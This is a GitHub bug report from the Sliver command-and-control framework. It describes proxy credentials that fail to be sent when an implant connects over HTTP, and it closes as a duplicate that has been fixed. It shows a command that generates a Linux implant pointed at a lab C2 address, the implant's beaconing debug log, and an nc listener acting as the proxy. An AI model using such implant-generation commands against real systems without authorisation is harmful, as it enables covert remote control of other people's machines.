### ISSUE TITLE
HTTP C2 option proxy-username & proxy-password not working

### ISSUE THREAD

**Issue by akmalhisyam** [BishopFox/sliver#1127] opened 2023-03-02 13:58 UTC
Proxy authentication is not sent to the proxy

```
=====================
Generate
=====================

sliver > generate --http http://192.168.10.10/?proxy=http://192.168.38.1:8080&proxy-username=098789&proxy-password=HehEhEyyyYyy --debug --name test001-linux-2 --os linux

[*] Generating new linux/amd64 implant binary
[*] Build completed in 17s
[*] Implant saved to /root/test001-linux-2

=====================
Run implant
=====================

[user@pc ~]$ ./test001-linux-2
2023/03/02 21:55:58 sliver.go:87: Hello my name is test001-linux-2
2023/03/02 21:55:58 limits.go:58: Limit checks completed
2023/03/02 21:55:58 sliver.go:105: Running in session mode
2023/03/02 21:55:58 session.go:67: Starting interactive session connection loop ...
2023/03/02 21:55:58 transports.go:41: Starting c2 url generator () ...
2023/03/02 21:55:58 transports.go:95: Return generator: (chan *url.URL)(0xc0000287e0)
2023/03/02 21:55:58 transports.go:83: Yield c2 uri = 'http://192.168.10.10?proxy=http://192.168.38.1:8080&proxy-username=098789&proxy-password=heheheyyyyyy'
2023/03/02 21:55:58 transports.go:83: Yield c2 uri = 'http://192.168.10.10?proxy=http://192.168.38.1:8080&proxy-username=098789&proxy-password=heheheyyyyyy'
2023/03/02 21:55:58 session.go:84: Next CC = http://192.168.10.10?proxy=http://192.168.38.1:8080&proxy-username=098789&proxy-password=heheheyyyyyy
2023/03/02 21:55:58 session.go:84: Next CC = http://192.168.10.10?proxy=http://192.168.38.1:8080&proxy-username=098789&proxy-password=heheheyyyyyy
2023/03/02 21:55:58 transports.go:83: Yield c2 uri = 'http://192.168.10.10?proxy=http://192.168.38.1:8080&proxy-username=098789&proxy-password=heheheyyyyyy'
2023/03/02 21:55:58 session.go:172: Connecting -> http(s)://192.168.10.10
2023/03/02 21:55:58 gohttp.go:97: Force proxy "http://192.168.38.1:8080"
2023/03/02 21:55:58 gohttp.go:107: Proxy URL = 'http://192.168.38.1:8080'
2023/03/02 21:55:58 httpclient.go:674: [http] segments = [oauth auth], filename = api, ext = php
2023/03/02 21:55:58 crypto.go:189: TOTP Code (2023-03-02 13:55:58.543726902 +0000 UTC): 59205940
2023/03/02 21:55:58 httpclient.go:339: [http] POST -> https://192.168.10.10/oauth/auth/api.html?a=5678c5344&fk=h592u05940 (106 bytes)

======================
"Proxy"
======================

[user@pc ~]$ sudo nc -lvp 8080
Listening on 0.0.0.0 8080
Connection received on hehe 34226
CONNECT 192.168.10.10:443 HTTP/1.1
Host: 192.168.10.10:443
User-Agent: Go-http-client/1.1
```

**Comment by 4lxs** [comment] 2023-03-26 11:11
Seems to be duplicate of #1126. Fixed by #1166

**Closed** 2023-03-27 04:34 UTC
Labels: bug
